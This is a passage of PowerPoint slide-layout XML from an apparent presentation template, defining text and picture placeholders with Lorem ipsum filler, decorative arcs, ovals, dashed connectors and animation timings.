            <a:off x="6462179" y="4159055"/>
            <a:ext cx="2099739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147" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="48" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6462180" y="4468789"/>
            <a:ext cx="2099739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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7231642" y="5269082"/>
            <a:ext cx="657777" cy="560681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>
                    <a:lumMod val="65000"/>
                  </a:schemeClr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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="153" name="Straight Connector 152"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9025467" y="1666242"/>
            <a:ext cx="0" cy="4147199"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash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0" name="Oval 159"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9577911" y="1782081"/>
            <a:ext cx="1823989" cy="1641590"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent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384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1" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="57"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476314" y="1675402"/>
            <a:ext cx="2063988" cy="1857589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62" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="51" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476311" y="3717493"/>
            <a:ext cx="2099739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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="52" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476311" y="4159055"/>
            <a:ext cx="2099739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164" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="53" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476312" y="4468789"/>
            <a:ext cx="2099739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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="54" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10245774" y="5269082"/>
            <a:ext cx="657777" cy="560681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>
                    <a:lumMod val="65000"/>
                  </a:schemeClr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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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400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400" fill="hold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400" fill="hold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300" fill="hold"/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300" fill="hold"/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300"/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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="58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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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5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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="92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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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3" dur="300" fill="hold"/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300" fill="hold"/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5" dur="300"/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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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9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5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="126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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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4" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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6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1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1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1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1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1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5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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0" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0"/>
      <p:bldP spid="6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69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6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6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0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0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7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7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2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7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7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7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8" grpId="0" animBg="1"/>
      <p:bldP spid="109" grpId="0"/>
      <p:bldP spid="114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14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5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7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1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1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1" grpId="0" animBg="1"/>
      <p:bldP spid="142" grpId="0"/>
      <p:bldP spid="14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45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4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4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4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4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8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4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4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4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0" grpId="0" animBg="1"/>
      <p:bldP spid="161" grpId="0"/>
      <p:bldP spid="162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62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6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6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3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3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6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6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5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6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6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6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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rounded Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="85" name="Straight Connector 84"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="603251" y="3810001"/>
            <a:ext cx="5329760" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash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 userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1622327"/>
            <a:ext cx="0" cy="4656556"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash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 userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6239948" y="3810001"/>
            <a:ext cx="5329760" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash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0" name="Arc 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999955" y="1622324"/>
            <a:ext cx="2112000" cy="1900798"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11622373"/>
              <a:gd name="adj2" fmla="val 10303517"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="127000" cap="sq" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="none"/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384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4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3383887" y="1901182"/>
            <a:ext cx="2549123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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95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3383887" y="2342746"/>
            <a:ext cx="2549123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96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3377544" y="2643087"/>
            <a:ext cx="2549123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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Oval 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603253" y="2203997"/>
            <a:ext cx="816001" cy="734399"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381000" cap="rnd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384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0" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681751" y="2203997"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257795" y="1764020"/>
            <a:ext cx="1692180" cy="1598076"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269135" h="1331730">
                <a:moveTo>
                  <a:pt x="603269" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="971017" y="0"/>
                  <a:pt x="1269135" y="298118"/>
                  <a:pt x="1269135" y="665865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1269135" y="1033612"/>
                  <a:pt x="971017" y="1331730"/>
                  <a:pt x="603269" y="1331730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="373427" y="1331730"/>
                  <a:pt x="170783" y="1215278"/>
                  <a:pt x="51122" y="1038157"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10130" y="962634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39648" y="946612"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="125833" y="888387"/>
                  <a:pt x="182497" y="789784"/>
                  <a:pt x="182497" y="677946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182497" y="566109"/>
                  <a:pt x="125833" y="467505"/>
                  <a:pt x="39648" y="409280"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="387760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51122" y="293574"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170783" y="116452"/>
                  <a:pt x="373427" y="0"/>
                  <a:pt x="603269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18" name="Arc 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6642996" y="1622324"/>
            <a:ext cx="2112000" cy="1900798"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11622373"/>
              <a:gd name="adj2" fmla="val 10303517"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="127000" cap="sq" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="none"/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384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1" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9026928" y="1901182"/>
            <a:ext cx="2549123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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9026928" y="2342746"/>
            <a:ext cx="2549123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123" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9020585" y="2643087"/>
            <a:ext cx="2549123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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Oval 129"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246296" y="2203997"/>
            <a:ext cx="816001" cy="734399"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="381000" cap="rnd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384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3" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324792" y="2203997"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="66"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900834" y="1764020"/>
            <a:ext cx="1692180" cy="1598076"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269135" h="1331730">
                <a:moveTo>
                  <a:pt x="603269" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="971017" y="0"/>
                  <a:pt x="1269135" y="298118"/>
                  <a:pt x="1269135" y="665865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1269135" y="1033612"/>
                  <a:pt x="971017" y="1331730"/>
                  <a:pt x="603269" y="1331730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="373427" y="1331730"/>
                  <a:pt x="170783" y="1215278"/>
                  <a:pt x="51122" y="1038157"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10130" y="962634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39648" y="946612"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="125833" y="888387"/>
                  <a:pt x="182497" y="789784"/>
                  <a:pt x="182497" y="677946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182497" y="566109"/>
                  <a:pt x="125833" y="467505"/>
                  <a:pt x="39648" y="409280"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="387760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51122" y="293574"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170783" y="116452"/>
                  <a:pt x="373427" y="0"/>
                  <a:pt x="603269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39" name="Arc 138"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999955" y="4121684"/>
            <a:ext cx="2112000" cy="1900798"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11622373"/>
              <a:gd name="adj2" fmla="val 10303517"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="127000" cap="sq" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="none"/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384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1" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383887" y="4400542"/>
            <a:ext cx="2549123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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383887" y="4842106"/>
            <a:ext cx="2549123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143" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3377544" y="5142447"/>
            <a:ext cx="2549123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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Oval 146"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603253" y="4703357"/>
            <a:ext cx="816001" cy="734399"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="381000" cap="rnd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384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9" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681751" y="4703357"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="71"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257795" y="4263380"/>
            <a:ext cx="1692180" cy="1598076"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269135" h="1331730">
                <a:moveTo>
                  <a:pt x="603269" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="971017" y="0"/>
                  <a:pt x="1269135" y="298118"/>
                  <a:pt x="1269135" y="665865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1269135" y="1033612"/>
                  <a:pt x="971017" y="1331730"/>
                  <a:pt x="603269" y="1331730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="373427" y="1331730"/>
                  <a:pt x="170783" y="1215278"/>
                  <a:pt x="51122" y="1038157"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10130" y="962634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39648" y="946612"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="125833" y="888387"/>
                  <a:pt x="182497" y="789784"/>
                  <a:pt x="182497" y="677946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182497" y="566109"/>
                  <a:pt x="125833" y="467505"/>
                  <a:pt x="39648" y="409280"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="387760"/>
                </a:lnTo>
